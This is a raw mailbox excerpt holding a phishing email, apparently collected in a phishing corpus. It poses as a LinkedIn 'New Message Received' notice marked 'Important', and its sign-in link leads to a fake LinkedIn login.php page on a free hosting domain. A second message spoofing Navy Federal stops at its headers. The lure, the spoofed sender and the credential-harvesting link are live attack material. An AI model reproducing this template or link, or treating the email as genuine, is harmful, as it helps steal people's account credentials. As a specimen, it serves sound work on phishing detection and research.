From: "LinkedIn" <test@podusia.ua>
Date: Mon, 17 Apr 2017 13:31:29 -0700
Reply-To: david.m435@zoho.com
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 145

You will not see this in a MIME-aware mail reader.
--===============0592259359==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


    =

   =

 =

    =

     =

	  =

     =


  =

   New Message Received	  =

     =

	  =

    =

 =

     =

	  =

     =

 =

    =

    =

     =

  	  David M Las has sent you a new business message.

  This message has been marked as 'Important'.

  Click here to sign in and read your messages =

  Thank you for using our services.	  =

 =

    =

    =

   =

   =

     =

 =

    =

    =

     =

   =

   =A92017 LinkedIn Ireland, Gardner House, Wilton Plaza, Wilton Place, Dub=
lin 2, Ireland
--===============0592259359==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE style=3D"MIN-WIDTH: 290px; FONT-FAMILY:=
 arial, helvetica; COLOR: rgb(0,0,0); FONT-SIZE: 12px" border=3D0 cellSpaci=
ng=3D0 cellPadding=3D0 width=3D600>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3D=
#dddddd>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666" height=3D21 vAlign=3Dcenter width=3D95 ali=
gn=3Dleft><A style=3D"BORDER-BOTTOM: medium none; BORDER-LEFT: medium none;=
 MIN-HEIGHT: 21px; WIDTH: 600px; DISPLAY: block; COLOR: rgb(0,51,153); BORD=
ER-TOP: medium none; CURSOR: pointer; BORDER-RIGHT: medium none; TEXT-DECOR=
ATION: none" href=3D"http://www.linkedin.com/e/v2?e=3D2fud6m-hrj7xnt2-l&amp=
;t=3Dnmp&amp;midToken=3DAQFPWpUVKeAp6g&amp;ek=3Dnu_digest" target=3D_blank>=
<FONT face=3D"tahoma, sans-serif"><IMG style=3D"BORDER-BOTTOM: medium none;=
 BORDER-LEFT: medium none; BORDER-TOP: medium none; BORDER-RIGHT: medium no=
ne" alt=3DLinkedIn src=3D"http://s.c.lnkd.licdn.com/scds/common/u/images/em=
ail/logos/logo_linkedin_tm_email_95x21_v1.png" width=3D95 height=3D21></FON=
T></A></TD></TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3D=
#333333>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666" width=3D20>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D20>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"LINE-HEIGHT: 0px; MIN-HEIGHT: 0px; FONT-SIZE: 0px"><FONT face=
=3D"tahoma, sans-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></TD>
<TD style=3D"LINE-HEIGHT: 1.666" width=3D"100%">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"MIN-HEIGHT: 14px; FONT-SIZE: 14px"><FONT face=3D"tahoma, sans=
-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE><FONT face=3D"tahoma, =
sans-serif"><BR>&nbsp;</FONT> =

<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666; COLOR: rgb(255,255,255); FONT-SIZE: 20pt" =
vAlign=3Dcenter align=3Dleft><SPAN style=3D"FONT-WEIGHT: 700"><FONT style=
=3D"FONT-SIZE: 20px" face=3D"tahoma, sans-serif">New Message Received</FONT=
></SPAN></TD>
<TD style=3D"LINE-HEIGHT: 1.666">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D20>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"LINE-HEIGHT: 0px; MIN-HEIGHT: 0px; FONT-SIZE: 0px"><FONT face=
=3D"tahoma, sans-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></TD>
<TD style=3D"LINE-HEIGHT: 1.666" vAlign=3Dcenter align=3Dright>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666"><FONT face=3D"tahoma, sans-serif">&nbsp;</=
FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"MIN-HEIGHT: 14px; FONT-SIZE: 14px"><FONT face=3D"tahoma, sans=
-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></TD>
<TD style=3D"LINE-HEIGHT: 1.666" width=3D20>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D20>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"LINE-HEIGHT: 0px; MIN-HEIGHT: 0px; FONT-SIZE: 0px"><FONT face=
=3D"tahoma, sans-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></TD><=
/TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3D=
#ffffff>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<TABLE style=3D"BACKGROUND-IMAGE: url(http://s.c.lnkd.licdn.com/scds/common=
/u/images/email/campaigns/network_updates_digest/herobg_connections_193x163=
_v01.png)" border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666" colSpan=3D3>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"LINE-HEIGHT: 20px; MIN-HEIGHT: 20px; FONT-SIZE: 20px"><FONT f=
ace=3D"tahoma, sans-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></T=
D></TR>
<TR vAlign=3Dtop>
<TD style=3D"LINE-HEIGHT: 1.666" width=3D30><IMG style=3D"BORDER-BOTTOM: me=
dium none; BORDER-LEFT: medium none; OUTLINE-STYLE: none; OUTLINE-COLOR: in=
vert; OUTLINE-WIDTH: medium; DISPLAY: block; BORDER-TOP: medium none; BORDE=
R-RIGHT: medium none" alt=3D"Mathew Huusko" src=3D"http://m.c.lnkd.licdn.co=
m/mpr/mpr/shrink_150_150/p/2/000/1bd/0d3/0f13a92.jpg" width=3D140 height=3D=
140></TD>
<TD style=3D"LINE-HEIGHT: 1.666" width=3D563><FONT size=3D2 face=3D"tahoma,=
 sans-serif"><B>&nbsp;David M Las&nbsp;</B>has sent you a new business mess=
age.<BR><BR>&nbsp; This message has been marked as '<B><FONT color=3D#ff000=
0>Important</FONT></B>'.<BR><BR><A style=3D"COLOR: blue; CURSOR: pointer; T=
EXT-DECORATION: underline" title=3D"http://ow.ly/ZF57o&#13;&#10;Ctrl+Klicke=
n oder tippen Sie, um dem Link zu folgen." href=3D"https://davidm435.000web=
hostapp.com/update%20linkidin/New%20linkedin/linkedin/login.php?rand=3D13In=
boxLightaspxn.1774256418&amp;fid.4.1252899642&amp;fid=3D1&amp;fav.1&amp;ran=
d.13InboxLight.aspxn.1774256418&amp;fid.1252899642&amp;fid.1&amp;fav.1&amp;=
email=3D&amp;.rand=3D13InboxLight.aspx?n=3D1774256418&amp;fid=3D4#n=3D12528=
99642&amp;fid=3D1&amp;fav=3D1" target=3D_blank>&nbsp;&nbsp;Click here to si=
gn in and read your messages</A>&nbsp;<BR>&nbsp; Thank you for using our se=
rvices.</FONT></TD>
<TD style=3D"LINE-HEIGHT: 1.666" width=3D4><FONT face=3D"tahoma, sans-serif=
">&nbsp;</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></T=
R></TBODY></TABLE>
<TABLE style=3D"WIDTH: 600px; FONT-FAMILY: arial, helvetica; TABLE-LAYOUT: =
fixed; COLOR: rgb(0,0,0); FONT-SIZE: 12px" border=3D0 cellSpacing=3D0 cellP=
adding=3D0 width=3D600>
<TBODY>
<TR style=3D"BACKGROUND-COLOR: rgb(51,51,51)">
<TD style=3D"LINE-HEIGHT: 1.666">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666"><FONT face=3D"tahoma, sans-serif">&nbsp;</=
FONT></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666"><FONT face=3D"tahoma, sans-serif">&nbsp;</=
FONT></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"LINE-HEIGHT: 12px; MIN-HEIGHT: 12px; FONT-SIZE: 12px"><FONT f=
ace=3D"tahoma, sans-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></T=
D></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-FAMILY: arial, helvetica; COLOR: rgb(0,0,0); FONT-SIZE=
: 12px" border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D600>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666; FONT-FAMILY: arial, verdana, sans-serif" a=
lign=3Dleft>
<TABLE style=3D"FONT-FAMILY: Helvetica, Arial, sans-serif" border=3D0 cellS=
pacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666; FONT-FAMILY: arial, verdana, sans-serif">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666">
<DIV style=3D"LINE-HEIGHT: 10px; MIN-HEIGHT: 10px; FONT-SIZE: 10px"><FONT f=
ace=3D"tahoma, sans-serif"></FONT>&nbsp;</DIV></TD></TR></TBODY></TABLE></T=
D></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666; FONT-FAMILY: arial, verdana, sans-serif" a=
lign=3Dleft>
<TABLE style=3D"FONT-FAMILY: Helvetica, Arial, sans-serif; COLOR: rgb(153,1=
53,153); FONT-SIZE: 11px" border=3D0 cellSpacing=3D0 cellPadding=3D0 width=
=3D"100%">
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 1.666; FONT-FAMILY: arial, verdana, sans-serif"><=
FONT face=3D"tahoma, sans-serif">=A92017 LinkedIn Ireland, Gardner House, W=
ilton Plaza, Wilton Place, Dublin 2, Ireland</FONT></TD></TR></TBODY></TABL=
E></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>
--===============0592259359==--

From jose@monkey.org Wed Apr 19 18:34:28 2017 +0000
Return-Path: notificatons@navyfederal.org
Delivered-To: jose@monkey.org
X-FDA: 72748290174.19.women83_7d798c8f87348
X-Spam-Summary: 88,1.2,0,4ba778f09f976acb,d41d8cd98f00b204,notificatons@navyfederal.org,:,RULES_HIT:2:21:41:72:327:355:379:455:967:973:978:979:983:988:989:1208:1260:1263:1308:1309:1313:1314:1345:1381:1431:1432:1433:1434:1437:1516:1517:1545:1571:1573:1575:1594:1685:1699:1719:1730:1747:1777:1792:2194:2198:2199:2200:2380:2393:2525:2527:2539:2553:2560:2564:2610:2612:2682:2685:2741:2859:2890:2891:2892:2893:2894:2901:2902:2910:2914:2919:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3352:3552:3664:3865:3867:3868:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4051:4078:4081:4321:4383:4384:4395:4700:4878:5007:6238:6239:6248:6261:6300:6671:6678:6688:7208:7809:7903:8518:8603:8651:8660:8957:9025:9074:9388:9411:9871:9908:10008:10049:10113:10346:11289:11473:11651:11657:11658:11914:12043:12295:12438:12555:12732:12737:12740:12776:12812:12895:12903:12963:12986:13007:13038:13132:13148:13230:13231:13439:14096:14194:14659:
X-HE-Tag: women83_7d798c8f87348
X-Filterd-Recvd-Size: 26340
Received: from navyfederal.org (rrcs-67-78-0-10.se.biz.rr.com [67.78.0.10])
	by imf22.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 19 Apr 2017 18:34:21 +0000 (UTC)
